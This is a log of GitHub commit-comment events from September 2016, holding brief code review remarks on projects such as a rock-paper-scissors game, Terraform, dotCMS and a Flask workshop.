{"id":"4627040895","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198332,"position":15,"line":15,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:23:19Z","updated_at":"2016-09-27T21:23:19Z","body":"just da class, and whatever it needs\n\nOn Tue, Sep 27, 2016 at 5:22 PM, Hank <notifications@github.com> wrote:\n\n> class computer_player, or just everything above?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/HankShorb/Sticks-Stones/commit/0d505162af471ec320d298a516c92e24bce4d6f8#commitcomment-19198322>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADcMX92PsflQncEnMOVN2Sz0VvrPmtSnks5quYkbgaJpZM4KIKb2>\n> .\n>\n"}},"created_at":"2016-09-27T21:23:19Z"}
{"id":"4627045692","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198346,"position":123,"line":123,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:24:13Z","updated_at":"2016-09-27T21:24:13Z","body":"``final_result[winner]() ``***"}},"created_at":"2016-09-27T21:24:13Z"}
{"id":"4627046279","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-adyen-plugin"},"payload":{"comment":{"id":19198349,"position":null,"line":null,"path":null,"commit_id":"1e1ed96d2e759d63077577a515ff3411ab2cd141","created_at":"2016-09-27T21:24:19Z","updated_at":"2016-09-27T21:24:19Z","body":"👍 "}},"created_at":"2016-09-27T21:24:19Z"}
{"id":"4627046673","type":"CommitCommentEvent","actor":{"login":"kumpera"},"repo":{"name":"rolfbjarne/HockeySDK-Xamarin"},"payload":{"comment":{"id":19198350,"position":10,"line":32,"path":"source/HockeySDK.iOSBindings/Additions.cs","commit_id":"862721199f1adec210bfc7b1943f975ffb8048a9","created_at":"2016-09-27T21:24:24Z","updated_at":"2016-09-27T21:24:24Z","body":"Running from the finally block protects the code from being aborted by the runtime.\r\n\r\nIt basically ensures that DoStartManage will actually be called after RemoveSignalHandlers return from the icall."}},"created_at":"2016-09-27T21:24:24Z"}
{"id":"4627047291","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198351,"position":123,"line":123,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:24:29Z","updated_at":"2016-09-27T21:24:29Z","body":"#functionreferences"}},"created_at":"2016-09-27T21:24:29Z"}
{"id":"4627047547","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19198353,"position":null,"line":null,"path":null,"commit_id":"9aa7a72a4adc364a566fc805c163e478e9953049","created_at":"2016-09-27T21:24:32Z","updated_at":"2016-09-27T21:24:32Z","body":"@SubJunk The DLNA issues with VLC has been there for years, it seems to have been very far from the top of their list for a long time. Since the mobile version is never I guess it's fresher code, maybe they've replaced the current DLNA implementation in the desktop application with the one from the mobile version in 3.0. I love VLC generally though, and use it as my general media player most of the time. "}},"created_at":"2016-09-27T21:24:32Z"}
{"id":"4627050086","type":"CommitCommentEvent","actor":{"login":"HankShorb"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198355,"position":15,"line":15,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:25:00Z","updated_at":"2016-09-27T21:25:00Z","body":"Okaykay"}},"created_at":"2016-09-27T21:25:00Z"}
{"id":"4627050628","type":"CommitCommentEvent","actor":{"login":"jankeromnes"},"repo":{"name":"espadrine/sc"},"payload":{"comment":{"id":19198356,"position":null,"line":null,"path":null,"commit_id":"be4f8e549484ef752541360a318fb860db5c5296","created_at":"2016-09-27T21:25:05Z","updated_at":"2016-09-27T21:25:05Z","body":"@espadrine What if `fn` doesn't exist in `this.stack`, or was previously removed? `index` would be `-1`, and I don't think you'd want to decrement `this.stackInsertion` nor am I sure how `splice()` behaves with a negative index."}},"created_at":"2016-09-27T21:25:05Z"}
{"id":"4627051758","type":"CommitCommentEvent","actor":{"login":"gfgtdf"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19198359,"position":null,"line":null,"path":null,"commit_id":"296902d426a0ad09310c7b661abf2126b9d60dea","created_at":"2016-09-27T21:25:17Z","updated_at":"2016-09-27T21:25:17Z","body":"wesnoth.delay uses CVideo::delay which is usually used for animations/ui effects and thus shoudl do nothing if the game was run in nogui mode. Did you test that this plusing works properly in nogui mode?"}},"created_at":"2016-09-27T21:25:17Z"}
{"id":"4627052273","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198360,"position":113,"line":113,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:25:22Z","updated_at":"2016-09-27T21:25:22Z","body":"spaces after comment hashes"}},"created_at":"2016-09-27T21:25:22Z"}
{"id":"4627053412","type":"CommitCommentEvent","actor":{"login":"marianoronchi"},"repo":{"name":"marianoronchi/OctoPrint"},"payload":{"comment":{"id":19198364,"position":null,"line":null,"path":null,"commit_id":"04c94f4460c11261175a81380361456c816d6649","created_at":"2016-09-27T21:25:35Z","updated_at":"2016-09-27T21:25:35Z","body":"Imagenes EXO"}},"created_at":"2016-09-27T21:25:35Z"}
{"id":"4627053444","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198365,"position":54,"line":54,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:25:35Z","updated_at":"2016-09-27T21:25:35Z","body":"oponent"}},"created_at":"2016-09-27T21:25:35Z"}
{"id":"4627055525","type":"CommitCommentEvent","actor":{"login":"HankShorb"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198369,"position":123,"line":123,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:25:58Z","updated_at":"2016-09-27T21:25:58Z","body":"^wtf, that's crazy\r\nPython can just take those strings ad \"()\" and it'll call the function of the same name?\r\nDid not know"}},"created_at":"2016-09-27T21:25:58Z"}
{"id":"4627056757","type":"CommitCommentEvent","actor":{"login":"DanteYe"},"repo":{"name":"Smarangk13/ELEC491Capstone2016"},"payload":{"comment":{"id":19198372,"position":1,"line":1,"path":"Test1.txt","commit_id":"c2f4ed9836c6dbc2b1f61d7638993a2721cb2d0a","created_at":"2016-09-27T21:26:12Z","updated_at":"2016-09-27T21:26:12Z","body":"why you removed this??"}},"created_at":"2016-09-27T21:26:12Z"}
{"id":"4627059532","type":"CommitCommentEvent","actor":{"login":"wowharley"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19198379,"position":null,"line":null,"path":null,"commit_id":"75f9164fc85e1551e3bb09903a9803719b774482","created_at":"2016-09-27T21:26:42Z","updated_at":"2016-09-27T21:26:42Z","body":"thanks vincent :)"}},"created_at":"2016-09-27T21:26:42Z"}
{"id":"4627059493","type":"CommitCommentEvent","actor":{"login":"gruen"},"repo":{"name":"jc4p/sunny-af"},"payload":{"comment":{"id":19198380,"position":null,"line":null,"path":null,"commit_id":"6efea7d2262ae0eb33c3ea39373e50ef41f7b6e3","created_at":"2016-09-27T21:26:43Z","updated_at":"2016-09-27T21:26:43Z","body":"see also: http://www.hitlistapp.com/"}},"created_at":"2016-09-27T21:26:43Z"}
{"id":"4627060837","type":"CommitCommentEvent","actor":{"login":"heckflosse"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":19198382,"position":null,"line":null,"path":null,"commit_id":"6ba96a10e97aee695d2a4b272a14c8a84cb71476","created_at":"2016-09-27T21:26:59Z","updated_at":"2016-09-27T21:26:59Z","body":":+1: "}},"created_at":"2016-09-27T21:26:59Z"}
{"id":"4627061788","type":"CommitCommentEvent","actor":{"login":"strugee"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19198385,"position":13,"line":13,"path":"README.md","commit_id":"5faed606cea9d2e700de6dcab68dcbd49228babc","created_at":"2016-09-27T21:27:10Z","updated_at":"2016-09-27T21:27:10Z","body":"@wooorm it's not unused: \r\n\r\n    .use(html)\r\n\r\nNo one will use this module on its own. It's pointless. Everyone will use it with some sort of output, and HTML output is the most common, the original target for Markdown, _and_ what this module was originally designed for. No one _has_ to use remark-html just because it's used in the README. What you're commenting on is an _example_, not the be-all end-all of remark-rewrite-headers usage. Examples are more useful if they actually _do_ something useful instead of just `require()`ing the module and being done with it.\r\n\r\nremark-html stays."}},"created_at":"2016-09-27T21:27:10Z"}
{"id":"4627063725","type":"CommitCommentEvent","actor":{"login":"Ameobea"},"repo":{"name":"tsbreuer/osu-auto-host"},"payload":{"comment":{"id":19198389,"position":null,"line":null,"path":null,"commit_id":"95de4d024dde0c93dffac710055183215fcab6ef","created_at":"2016-09-27T21:27:32Z","updated_at":"2016-09-27T21:27:32Z","body":"That was easy :Kappa:"}},"created_at":"2016-09-27T21:27:32Z"}
{"id":"4627063757","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19198390,"position":null,"line":null,"path":null,"commit_id":"eba53e026fc02018ced683d39c08ae7c2d8dfe8e","created_at":"2016-09-27T21:27:32Z","updated_at":"2016-09-27T21:27:32Z","body":"Thanks for getting this started!"}},"created_at":"2016-09-27T21:27:32Z"}
{"id":"4627065001","type":"CommitCommentEvent","actor":{"login":"sc4ryb3ar"},"repo":{"name":"ChikaraOSP/manifest"},"payload":{"comment":{"id":19198395,"position":null,"line":null,"path":null,"commit_id":"f41b7cd64f510da8897f6929224314bb5b0140df","created_at":"2016-09-27T21:27:46Z","updated_at":"2016-09-27T21:27:46Z","body":"That's not entirely true anymore, it recognizes some of it, but not all of it. They're working on integrating all of it."}},"created_at":"2016-09-27T21:27:46Z"}
{"id":"4627065191","type":"CommitCommentEvent","actor":{"login":"maryamklabib"},"repo":{"name":"hashicorp/terraform"},"payload":{"comment":{"id":19198396,"position":28,"line":91,"path":"vendor/github.com/Azure/azure-sdk-for-go/management/http.go","commit_id":"9fb9b673814f4ab86019d0b5abee7a06d73a02c6","created_at":"2016-09-27T21:27:48Z","updated_at":"2016-09-27T21:27:48Z","body":"This broke our build with the following error:\r\n\r\n```\r\n/go/src/github.com/hashicorp/terraform/vendor/github.com/Azure/azure-sdk-for-go/management/http.go:91: unknown tls.Config field 'Renegotiation' in struct literal\r\n```"}},"created_at":"2016-09-27T21:27:48Z"}
{"id":"4627065379","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198397,"position":123,"line":123,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:27:50Z","updated_at":"2016-09-27T21:27:50Z","body":"python is ~ w e i r d ~"}},"created_at":"2016-09-27T21:27:50Z"}
{"id":"4627068065","type":"CommitCommentEvent","actor":{"login":"JReyLBC"},"repo":{"name":"robscodebase/azo"},"payload":{"comment":{"id":19198405,"position":50,"line":42,"path":"parser.go","commit_id":"4573c902e98a96aff6ec09a0a2e8c4d0a3fb9b4e","created_at":"2016-09-27T21:28:21Z","updated_at":"2016-09-27T21:28:21Z","body":"Since there is actually no computation happening here, you can separate these returned variables into constants, and just use them wherever you need them.\r\n\r\nFor example:\r\n\r\n```go\r\nconst (\r\n    idResult = `<li id=\"result\"`\r\n    spanLast = `a-span-last\"`\r\n)\r\n```"}},"created_at":"2016-09-27T21:28:21Z"}
{"id":"4627070466","type":"CommitCommentEvent","actor":{"login":"rgouveia-syone"},"repo":{"name":"rgouveia-syone/nodejs-ex"},"payload":{"comment":{"id":19198411,"position":null,"line":null,"path":null,"commit_id":"4fb369457cba930fad0f37d7cfa1d12b943cb179","created_at":"2016-09-27T21:28:50Z","updated_at":"2016-09-27T21:28:50Z","body":"Reverting for take 2"}},"created_at":"2016-09-27T21:28:50Z"}
{"id":"4627073795","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19198420,"position":null,"line":null,"path":null,"commit_id":"0818d05fff59c457ca7a0855a469d3984ddab366","created_at":"2016-09-27T21:29:27Z","updated_at":"2016-09-27T21:29:27Z","body":"The following doc(s) have been deployed to the [codeofcon](https://codeofcon-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/code-of-conduct](https://codeofcon-static-docs.pantheonsite.io/docs/code-of-conduct)\n- [docs/power-users](https://codeofcon-static-docs.pantheonsite.io/docs/power-users)\n- [CODE_OF_CONDUCT.md](https://github.com/pantheon-systems/documentation/commit/0818d05fff59c457ca7a0855a469d3984ddab366/CODE_OF_CONDUCT.md)\n"}},"created_at":"2016-09-27T21:29:27Z"}
{"id":"4627074880","type":"CommitCommentEvent","actor":{"login":"HankShorb"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198422,"position":54,"line":54,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:29:39Z","updated_at":"2016-09-27T21:29:39Z","body":"opps"}},"created_at":"2016-09-27T21:29:39Z"}
{"id":"4627075373","type":"CommitCommentEvent","actor":{"login":"HankShorb"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198425,"position":54,"line":54,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:29:44Z","updated_at":"2016-09-27T21:29:44Z","body":"oops*"}},"created_at":"2016-09-27T21:29:44Z"}
{"id":"4627078249","type":"CommitCommentEvent","actor":{"login":"tpmodding"},"repo":{"name":"WoLpH/hyperion.kodi"},"payload":{"comment":{"id":19198431,"position":null,"line":null,"path":null,"commit_id":"d2a97b83f1a2a9a2186c8a94fcb8273aa0ab4de1","created_at":"2016-09-27T21:30:16Z","updated_at":"2016-09-27T21:30:16Z","body":"Will try it :)"}},"created_at":"2016-09-27T21:30:16Z"}
{"id":"4627079827","type":"CommitCommentEvent","actor":{"login":"stsp"},"repo":{"name":"stsp/dosemu2"},"payload":{"comment":{"id":19198433,"position":null,"line":null,"path":null,"commit_id":"7374a6e0978ee4d35f764401719a027034c0173d","created_at":"2016-09-27T21:30:32Z","updated_at":"2016-09-27T21:30:32Z","body":"Likely, but I failed to disable the cursor acceleration\r\non the MS mouse driver, and that acceleration stuff\r\nalways makes the cursors out of sync.\r\nWe can probably emulate some tablet too, but sermouse\r\nis sermouse, and this limitation is unsolvable for it.\r\nWho cares if we already have int33.\r\nThis patch is just a joke basically. I initially implemented\r\nsermouse just to test our int33 API and compare it to\r\nthe native drivers. This paid off very well, because I was\r\nable to try many things with the native driver to understand\r\nthem better. I don't think this is useful for something else."}},"created_at":"2016-09-27T21:30:32Z"}
{"id":"4627083450","type":"CommitCommentEvent","actor":{"login":"mathiasrw"},"repo":{"name":"parallel-js/parallel.js"},"payload":{"comment":{"id":19198440,"position":13,"line":13,"path":".travis.yml","commit_id":"0266b118072c29b9d2cffbba3aa57eb83facdb1f","created_at":"2016-09-27T21:31:12Z","updated_at":"2016-09-27T21:31:12Z","body":"Sure! It was the `install` part I was commenting..."}},"created_at":"2016-09-27T21:31:12Z"}
{"id":"4627084603","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":19198441,"position":null,"line":null,"path":null,"commit_id":"294187bdacb059de245e0b8e0d3161d68a07bfbc","created_at":"2016-09-27T21:31:25Z","updated_at":"2016-09-27T21:31:25Z","body":"Now I'm far from being a good programmer but...\r\n\r\nLol\r\n\r\nThen again, if it works, right?"}},"created_at":"2016-09-27T21:31:25Z"}
{"id":"4627084612","type":"CommitCommentEvent","actor":{"login":"vanfstd"},"repo":{"name":"ioannad/experiments"},"payload":{"comment":{"id":19198442,"position":53,"line":56,"path":"rpiOS/K9OS/k9os.c","commit_id":"dab4692eedcefd23f5acb07591d03878ce776c42","created_at":"2016-09-27T21:31:25Z","updated_at":"2016-09-27T21:31:25Z","body":">  and it knows which one of a, b is a pointer and which is a number\r\n\r\nThe compiler knows that because `a` and `b` have to be declared somewhere.  So the compiler knows their types (two major categories of types being 'integer types' (e.g. `char`, `int`, `long`, ...) and 'pointer types' (e.g. `short *`, `int *`, `struct unicorn *`))\r\n\r\nIf both operands are numbers, regular addition is done (obviously).\r\n\r\nIf exactly one of the operands of an addition, pointer arithmetic is done: A multiple (>=1, depending on the size of the pointed-to type of the pointer) of the integer is added to the pointer, the result is a pointer that points into the same array the original pointer pointed into, but some elements further into it.\r\n\r\nIf both operands are pointers, it won't compile because it doesn't make sense to add together two addresses (`100 + Koelnstr. 42` makes sense, but  `Koelnstr. 42 + Bonner Talweg 123`? Not so much.)\r\n\r\n> though they are both represented by int. \r\n\r\nOn your machine anyway :) C doesn't guaranteed you that pointers are integers \"behind the scenes\" (however your C implementation for the hardware you're working with probably does). Outside embedded programming, there's hardly ever a need to know details about how pointer values are represented in memory.\r\n\r\nCheers"}},"created_at":"2016-09-27T21:31:25Z"}
{"id":"4627086242","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198448,"position":3,"line":3,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:31:45Z","updated_at":"2016-09-27T21:31:45Z","body":"i also would include a detailed readme including the following:\r\n\r\nwhat you did\r\ndecisions you made around organization + implementation\r\nwhat you could do better with the current implementation given more time\r\n- what would need to be changed if this was going to be deployed in a production environment?\r\n- what isn't scalable? what isn't performant, and could be improved? \r\nwhat are you interested in doing next with this project? \r\n- what are the next steps of this project?\r\n- any interest or ideas for a related project that stems from ideas from this project?\r\n\r\n"}},"created_at":"2016-09-27T21:31:45Z"}
{"id":"4627087038","type":"CommitCommentEvent","actor":{"login":"bcjordan"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":19198452,"position":null,"line":null,"path":null,"commit_id":"2fe5c60a54210c42c9195aa0a8e65ddc778129c9","created_at":"2016-09-27T21:31:53Z","updated_at":"2016-09-27T21:31:53Z","body":"@davidsbailey btw may need to add a `require_relative '../../deployment'` to get CDO in this context"}},"created_at":"2016-09-27T21:31:53Z"}
{"id":"4627087618","type":"CommitCommentEvent","actor":{"login":"orloffski"},"repo":{"name":"orloffski/FlagQuiz"},"payload":{"comment":{"id":19198454,"position":null,"line":null,"path":null,"commit_id":"83fada52229910eb27a17bcfe9966851913c27c7","created_at":"2016-09-27T21:32:01Z","updated_at":"2016-09-27T21:32:01Z","body":"Rev 1.005 а не Rev 1.004"}},"created_at":"2016-09-27T21:32:01Z"}
{"id":"4627090225","type":"CommitCommentEvent","actor":{"login":"rainwoodman"},"repo":{"name":"desihub/desitarget"},"payload":{"comment":{"id":19198459,"position":3,"line":178,"path":"py/desitarget/cuts.py","commit_id":"0f2acf6eb221b0da576be2342f6aefa94a2a5182","created_at":"2016-09-27T21:32:29Z","updated_at":"2016-09-27T21:32:29Z","body":"Hi,\r\n\r\nIs the intention to update the TS wiki about this change too? https://desi.lbl.gov/trac/wiki/TargetSelectionWG/TargetSelection#EmissionLinesGalaxiesELG\r\n"}},"created_at":"2016-09-27T21:32:29Z"}
{"id":"4627094342","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19198466,"position":248,"line":248,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T21:33:16Z","updated_at":"2016-09-27T21:33:16Z","body":"Another reference to the APILocator as pointed out above by @jdotcms. Extract to instance variable"}},"created_at":"2016-09-27T21:33:16Z"}
{"id":"4627095542","type":"CommitCommentEvent","actor":{"login":"JustinPhlegar"},"repo":{"name":"Orasi/Selenium-Java-Core"},"payload":{"comment":{"id":19198472,"position":93,"line":544,"path":"src/main/java/com/orasi/utils/TestEnvironment.java","commit_id":"6657c5d10c7b0cb08c97690df229076f112dd6d8","created_at":"2016-09-27T21:33:29Z","updated_at":"2016-09-27T21:33:29Z","body":"Let's throw and AutomationException(string errorMessage, e) here instead of stacktrace"}},"created_at":"2016-09-27T21:33:29Z"}
{"id":"4627096405","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19198474,"position":257,"line":257,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T21:33:39Z","updated_at":"2016-09-27T21:33:39Z","body":"Same as above"}},"created_at":"2016-09-27T21:33:39Z"}
{"id":"4627097353","type":"CommitCommentEvent","actor":{"login":"pcmoore"},"repo":{"name":"rgbriggs/audit-testsuite"},"payload":{"comment":{"id":19198478,"position":121,"line":121,"path":"tests/filter_exclude/test","commit_id":"d79efe31c69ce82183a357a587fdcd73e3253f9b","created_at":"2016-09-27T21:33:51Z","updated_at":"2016-09-27T21:33:51Z","body":"We should actually check the record like we do everywhere else (is it a SYSCALL create record?)"}},"created_at":"2016-09-27T21:33:51Z"}
{"id":"4627097384","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19198479,"position":259,"line":259,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T21:33:52Z","updated_at":"2016-09-27T21:33:52Z","body":"Same as above"}},"created_at":"2016-09-27T21:33:52Z"}
{"id":"4627100014","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19198509,"position":282,"line":282,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T21:34:21Z","updated_at":"2016-09-27T21:34:21Z","body":"Same as above"}},"created_at":"2016-09-27T21:34:21Z"}
{"id":"4627103901","type":"CommitCommentEvent","actor":{"login":"ngimel"},"repo":{"name":"NVIDIA/torch-cudnn"},"payload":{"comment":{"id":19198522,"position":36,"line":160,"path":"find.lua","commit_id":"156b7edc1d05d42f5e899481f8855a92eb9e41c1","created_at":"2016-09-27T21:35:08Z","updated_at":"2016-09-27T21:35:08Z","body":"Boris, cudnn.fastest used to not call Find/FindEx, it used Get instead. It looks like you've changed that behavior. "}},"created_at":"2016-09-27T21:35:08Z"}
{"id":"4627104785","type":"CommitCommentEvent","actor":{"login":"DiglidiDudeNG"},"repo":{"name":"popcorncolonel/Chrome-Extensions"},"payload":{"comment":{"id":19198529,"position":75,"line":348,"path":"Kappa Everywhere/contentscript.js","commit_id":"365f938289577306cad9754867d44c9f27e7866c","created_at":"2016-09-27T21:35:18Z","updated_at":"2016-09-27T21:35:18Z","body":"Nah i'm making my own fork of it. I would suggest btw that you separate your projects within repos. I'm probably going to make my own version. There's a lot of cleaning up to do in this code too, and I don't think you'll appreciate how I handle the clean-up."}},"created_at":"2016-09-27T21:35:18Z"}
{"id":"4627105201","type":"CommitCommentEvent","actor":{"login":"pcmoore"},"repo":{"name":"rgbriggs/audit-testsuite"},"payload":{"comment":{"id":19198532,"position":146,"line":146,"path":"tests/filter_exclude/test","commit_id":"d79efe31c69ce82183a357a587fdcd73e3253f9b","created_at":"2016-09-27T21:35:22Z","updated_at":"2016-09-27T21:35:22Z","body":"In addition to the positive test above (we can create and destroy a file with the corresponding audit records), we should also do a negative test with an exclude filter active to prevent the creation of the audit records and test for the *absence* of the audit records."}},"created_at":"2016-09-27T21:35:22Z"}
{"id":"4627106172","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198534,"position":3,"line":3,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:35:33Z","updated_at":"2016-09-27T21:35:33Z","body":"essentially your goal with the above points is to create an astute representation of your technical skills - employers are used to looking at coding and seeing what they would change - and if you address the things on their mind by saying it could be done better its reaffirming for them (that they are correct) but also that your work is not limited by what they are seeing - what is limiting your work is the time/effort that was put forth for the project - which is easily changed"}},"created_at":"2016-09-27T21:35:33Z"}
{"id":"4627110679","type":"CommitCommentEvent","actor":{"login":"TuTPhoto"},"repo":{"name":"darktable-org/darktable"},"payload":{"comment":{"id":19198548,"position":null,"line":null,"path":null,"commit_id":"08b699a663341480b58061d851bb074effdc1873","created_at":"2016-09-27T21:36:25Z","updated_at":"2016-09-27T21:36:25Z","body":"Fixed rather all fuzzy strings"}},"created_at":"2016-09-27T21:36:25Z"}
{"id":"4627115430","type":"CommitCommentEvent","actor":{"login":"katie7r"},"repo":{"name":"cuttlesoft/flask-workshop"},"payload":{"comment":{"id":19198560,"position":9,"line":9,"path":"app.py","commit_id":"040106b8cf92b79a94c664b3f2277ea26560f113","created_at":"2016-09-27T21:37:16Z","updated_at":"2016-09-27T21:37:16Z","body":"This line should be replaced with\r\n```\r\nif __name__ == '__main__':\r\n    app.run(debug=True)\r\n```\r\nso that it will run when invoked but not when imported."}},"created_at":"2016-09-27T21:37:16Z"}
{"id":"4627117002","type":"CommitCommentEvent","actor":{"login":"jc4p"},"repo":{"name":"jc4p/sunny-af"},"payload":{"comment":{"id":19198567,"position":null,"line":null,"path":null,"commit_id":"6efea7d2262ae0eb33c3ea39373e50ef41f7b6e3","created_at":"2016-09-27T21:37:35Z","updated_at":"2016-09-27T21:37:35Z","body":"@gruen wow this is rad"}},"created_at":"2016-09-27T21:37:35Z"}
{"id":"4627118750","type":"CommitCommentEvent","actor":{"login":"HankShorb"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198571,"position":3,"line":3,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:37:55Z","updated_at":"2016-09-27T21:37:55Z","body":"Alright alright\r\n\r\nBtw, this is not for an employer. But I have been curious to what extent they will view this stuff like one, since the program is aimed towards beginners as well (which tbh, I consider myself closer to that side of the spectrum).\r\n\r\nWhat is a production environment? I have no idea"}},"created_at":"2016-09-27T21:37:55Z"}
{"id":"4627120951","type":"CommitCommentEvent","actor":{"login":"Rafael-Herculano"},"repo":{"name":"Rafael-Herculano/MeuPrimeiroProjeto"},"payload":{"comment":{"id":19198582,"position":2,"line":2,"path":"README.md","commit_id":"8d70a579c58ac461525a06447916c9fa056cfa8b","created_at":"2016-09-27T21:38:21Z","updated_at":"2016-09-27T21:38:21Z","body":"<!DOCTYPE html>\r\n<html>\r\n    <head>\r\n\t</head>\r\n\t<body>\r\n        <p>\r\n          <?php\r\n            echo \"Minha primeira linha em PHP!\"; \r\n          ?>\r\n        </p>\r\n\t</body>\r\n</html>"}},"created_at":"2016-09-27T21:38:21Z"}
{"id":"4627121885","type":"CommitCommentEvent","actor":{"login":"katie7r"},"repo":{"name":"cuttlesoft/flask-workshop"},"payload":{"comment":{"id":19198584,"position":6,"line":6,"path":"requirements.txt","commit_id":"040106b8cf92b79a94c664b3f2277ea26560f113","created_at":"2016-09-27T21:38:32Z","updated_at":"2016-09-27T21:38:32Z","body":"After installing requirements with pip, you can write them to your requirements file by running `pip freeze > requirements.txt`."}},"created_at":"2016-09-27T21:38:32Z"}
{"id":"4627124279","type":"CommitCommentEvent","actor":{"login":"Rafael-Herculano"},"repo":{"name":"Rafael-Herculano/MeuPrimeiroProjeto"},"payload":{"comment":{"id":19198591,"position":null,"line":null,"path":null,"commit_id":"8d70a579c58ac461525a06447916c9fa056cfa8b","created_at":"2016-09-27T21:39:00Z","updated_at":"2016-09-27T21:39:00Z","body":"<!DOCTYPE html>\r\n<html>\r\n    <head>\r\n\t</head>\r\n\t<body>\r\n        <p>\r\n          <?php\r\n            echo \"Minha primeira linha em PHP!\"; \r\n          ?>\r\n        </p>\r\n\t</body>\r\n</html>"}},"created_at":"2016-09-27T21:39:00Z"}
{"id":"4627130853","type":"CommitCommentEvent","actor":{"login":"jcvenegas"},"repo":{"name":"dlespiau/hyperstart"},"payload":{"comment":{"id":19198604,"position":null,"line":null,"path":null,"commit_id":"2f3e4ac53f2b258e9d428535c0e6268f4036357f","created_at":"2016-09-27T21:40:19Z","updated_at":"2016-09-27T21:40:19Z","body":"I dont see here where shared dir is mounted, are you planning that daemon mode will mount the shared rootfs or will expect that would be mounted before the daemon start ?"}},"created_at":"2016-09-27T21:40:19Z"}
{"id":"4627136806","type":"CommitCommentEvent","actor":{"login":"BramVV"},"repo":{"name":"pxlit-projects/classroom-exercise-1-BramVV"},"payload":{"comment":{"id":19198612,"position":null,"line":null,"path":null,"commit_id":"d587f1d450d8de7f11eccff717ac3a9df2b89949","created_at":"2016-09-27T21:41:28Z","updated_at":"2016-09-27T21:41:28Z","body":"Ja dat werkte, ma ik wist niet of ik het op de juiste manier had gedaan."}},"created_at":"2016-09-27T21:41:28Z"}
